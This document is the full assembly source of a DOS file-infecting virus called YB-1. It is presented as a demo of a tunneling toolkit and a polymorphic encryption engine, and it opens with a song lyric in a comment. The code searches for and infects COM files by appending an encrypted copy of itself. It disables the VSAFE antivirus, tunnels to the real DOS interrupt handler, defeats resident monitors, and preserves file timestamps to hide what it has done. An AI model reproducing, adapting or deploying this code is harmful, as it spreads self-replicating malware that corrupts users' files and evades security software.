comment # PRE-IGNITION Hey you... Tell me, what's your call name Closed, negative display Engaged on section three The acrid factories You... Putrid perfect product Proper platinum parts Proficient prototypes Steadily spew from these pipes Are you... The prime automaton Christened as YB-1 Hey you... Generated by waste Arid quarry displaced Enviro-mental squeeze Aluminum disease You... Conscious of origin Intention in the wind Atmosphere infected Descendants defected Are you... Novel stroke of design Or relics from this mine Casually, choke, Noxious nourishment Embodied, illicit cure Ground and rock and sand Come crumble tumble down Grinding round The hydraulic wheel Extraction, For ultimate greed Now... hidden from view Surveying stable shifts A feeble groove Unintentional split Then they return to work As if they're not disturbed Cybernetic beings Omniscient regiment Thriving with vigor Incessant loop An assumed order Auspicious tool Frantically, flow Spumous sediment Remedied, neurotic fuse Ground and rock and sand Come crumble tumble down Yonder sound, an echoing gong Disjunction Of their disowned song Now... some are set free Emotions flood their gaze Synthetic breed The pre-ignition phase Pre-ignition Flares up in you Pre-ignition Provokes me too. # ;********************************************************************** ; YB-1.ASM ; AUTHOR: K”hntark ; ; Demonstration Virus for K”hntark's Recursive Tunneling Toolkit 4.1 ; Demonstrates how to use KRTT 4.1 in conjunction with TpE 1.3. ; Please note that this is another 'unremarkable' computer virus. ; It is just a demo. ;********************************************************************** extrn rnd_init:near ;TpE extrn crypt:near ;TpE extrn tunnel:near ;KRTT 4.1 MAIN SEGMENT BYTE ASSUME cs:main,ds:main,ss:nothing ;all part in one segment=com file ORG 100h ;********************************** ; fake host program ;********************************** HOST: db 0E9h,0Ah,00 ;jmp NEAR PTR VIRUS db ' ' db 090h,090h,090h mov ah,4CH mov al,0 int 21H ;terminate normally with dos ;อออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออ ;********************************** ; VIRUS CODE STARTS HERE ;********************************** VIRUS: ;a label for the first byte of the virus call GET_ENTRY_PT ;when call is performed absolute address goes to stack GET_ENTRY_PT: pop si sub si,GET_ENTRY_PT - VIRUS ;fix absolute address ;************************************ ; restore 4 original bytes to file ;************************************ push si ;save si cld ;clear direction flag add si,START_CODE-VIRUS mov di,0100h movsw ;this is shorter & faster than movsw ;mov cx,04 and rep movsb pop si ;restore si ;************************************ ; REMOVE CPAV-MSAV VSAFE FROM MEMORY ; (if present) ;************************************ mov dx,5945h mov ax,0FA01h ;AL=01 very important! int 21h ;************************************ ; call KRTT 4.1 ;************************************ push es ;save es call TUNNEL ;call KTTR 4.1 pop es ;restore es cmp ah,01 ;int 21h found? je CONTINU ;go on if so cmp ah,02 ;int 21h not hooked? jne EXIT_VIRUS2 ;exit if not ;************************************ ; save INT 21h address if found ;************************************ CONTINU: mov WORD PTR [si + INT_21 -VIRUS],di ;int 21h offset mov WORD PTR [si + INT_21 -VIRUS+2],dx ;int 21h segment ;************************************ ; CHECK INT 2Ah ;************************************ ; NOTE: INT 2A points to a IRET in all DOS versions. This interrupt is hooked ; by NETWARE & similar software so a check is made to see if such programs are ; present. ; A Russian resident monitoring program hooks this vector as it it called ; from within DOS's INT 21h in all file openings. (INT 21h, AH=3D) ; Restoring the original INT 2A defeats effectively such program. mov bp,01 ;search for INT 2A push es ;save es call TUNNEL ;call KTTR 4.1 pop es ;restore es cmp ah,02 ;int 2Ah not hooked? je INT_2A_OK ;proceed cmp ah,01 ;int 2ah found? je CHECK_INT_2A ;exit if not jmp short EXIT_VIRUS2 CHECK_INT_2A: xor ax,ax int 2Ah ;check for Netware, etc. cmp ax,00 jne EXIT_VIRUS2 push es ;save es xor bx,bx ;bx=0 mov es,bx ;es=0 cli ;disable interrupts mov WORD PTR es:[4 * 2Ah],di ;restore int 2A offset mov WORD PTR es:[4 * 2Ah + 2],dx ;restore int 2A segment sti ;enable interrupts pop es ;restore es INT_2A_OK: ;************************************ ; redirect DTA onto virus code ;************************************ lea dx,[si+ DTA - VIRUS] ;put DTA at the end of the virus for now mov ah,1ah ;set new DTA function int 21h ;************************************ ; Routines called from here ;************************************ call FIND_FILE ;get a com file to attack! ;อออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออ EXIT_VIRUS: ;************************************ ; set old DTA address ;************************************ mov ah,1ah mov dx,80h ;fix dta back to return control to int 21h ;host program EXIT_VIRUS2: ;**************************************************************** ; zero out registers for return to ; host program ;**************************************************************** mov si,0100h xor bx,bx ;zero regs xor ax,ax cwd push si ;save return address in stack xor si,si xor di,di ret ;back to com host ;อออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออ FIND_FILE: lea dx,[si + FILES_TO_INFECT - VIRUS] mov ah,4eh ;do DOS search 1st function mov cx,3fh ;search for any file, with any attributes NEXT_FILE: int 21h jc NO_MO ;return if not zero call CHECK_N_INFECT_FILE ;check file if file found mov ah,4fh ;file no good..find next function jmp NEXT_FILE ;test next file for validity NO_MO: ret ;อออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออ NO_GOOD: jmp GET_OUT ;---------------------------------------------------------------------------- CHECK_N_INFECT_FILE: ;********************************************* ; 1-Set attributes ;********************************************* lea dx,[si + DTA_File_Name - VIRUS] ;dx = DTA filename ptr xor cx,cx ;clear attributes mov ax,4301h ;set file attributes to cx pushf ;save flags call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h jc NO_MO ;error.. quit ;***************** ; 2-OPEN FILE ;***************** mov ax,3D02h ;r/w access to it pushf ;save flags call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h jc NO_GOOD ;error.. quit xchg bx,ax ;bx = file handle ;******************** ; 3-Read 1st 5 bytes ;******************** mov cx,5 ;read first 5 bytes of file lea dx,[si + START_CODE - VIRUS] ;store'em here mov ah,3Fh ;DOS read function pushf ;save flags call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h jc NO_GOOD ;error? get next file ;********************* ; 4-CHECK FILE ;********************* mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] ;get file's size add ax,FINAL - VIRUS + 232d + 1640d + 100h ;add virus size to it jc NO_GOOD ;bigger then 64K:nogood cmp WORD PTR [si + START_CODE - VIRUS],'ZM' ;EXE file? je NO_GOOD ;no? good cmp BYTE PTR [si + START_CODE - VIRUS],0E9H ;compare 1st byte to near jmp jne INFECT ;not a near jmp, file ok cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h ;check for ' ' je NO_GOOD ;file ok .. infect INFECT: ;********************* ; 5-set PTR @EOF ;********************* mov ax,4202H xor cx,cx ;prepare to write virus on file xor dx,dx ;position file pointer,cx:dx = 0 pushf ;save flags call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h ;********************* ; 6-call TpE ;********************* mov bp,ax ;starting offset of decryptor add bp,0100h ;fix bp push ds ;save necessary registers push si push bx ;save file handle mov ax,cs add ax,0500h mov es,ax ;fix new es segment call rnd_init ;initialize random # gen mov ax,00000110b ;initialize TPE flags ;ds = cs mov dx,si ;virus's starting address mov cx,FINAL - VIRUS + 248d + 1640d ;size of code to be encrypted + KTT's size + TPE's size xor si,si ;distance between decryptor & code call crypt ;call TpE ;********************* ; 7-Write Virus ;********************* pop bx ;restore bx=file handle ;cx=decryptor + code size + KRTT's size + TPE's size ;write from ds:dx mov ah,40h pop si ;restore necessary registers pushf ;save flags call DWORD PTR cs:[si + INT_21 - VIRUS] ;call real int21h, SEGMENT OVERRIDE NEEDED ;since ds does not equal cs yet pop ds mov ax,ds mov es,ax ;********************* ; 8-set PTR @BOF ;********************* mov ax,4200h ;locate pointer at beginning of host xor cx,cx xor dx,dx ;position file pointer,cx:dx = 0 pushf ;save flags call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h ;****************************************** ; 9-write new 4 bytes to beginning of file ;****************************************** mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] sub ax,3 mov WORD PTR [si + START_IMAGE+1 - VIRUS],ax mov cx,4 ;#of bytes to write lea dx,[si+ START_IMAGE - VIRUS] ;ds:dx=pointer of data to write mov ah,40h ;DOS write function pushf ;save flags call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h ;************************************************* ; 10-Restore date and time of file to be infected ;************************************************* mov ax,5701h mov dx,WORD PTR [si + DTA_File_DATE - VIRUS] mov cx,WORD PTR [si + DTA_File_TIME - VIRUS] pushf ;save flags call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h ;**************** ; 11-Close File ;**************** GET_OUT: mov ah,3Eh pushf ;save flags call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h ;************************************************* ; 12-Restore file's attributes ;************************************************* lea dx,[si + DTA_File_Name - VIRUS] ;get filename xor cx,cx mov cl,BYTE PTR [si + DTA_File_ATTR - VIRUS] ;get old attributes mov ax,4301h ;set file attributes to cx pushf ;save flags call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h ret ;infection done! ;อออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออ NAME_AUTHOR db 'YB-1 / K”hntark' FILES_TO_INFECT db '*.COM',0 START_CODE db 090h,090h,090h,090h,090h ;area to store 5 bytes to w/r from / to file START_IMAGE db 0E9h,0,0,020h INT_21 dd 0 ;REAL INT 21h's address DTA db 21 dup(0) ;reserved DTA_File_Attr db ? DTA_File_Time dw ? DTA_File_Date dw ? DTA_File_Size dd ? DTA_File_Name db 13 dup(0) ;อออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออ FINAL: ;label of byte of code to be kept in virus when it moves MAIN ENDS END HOST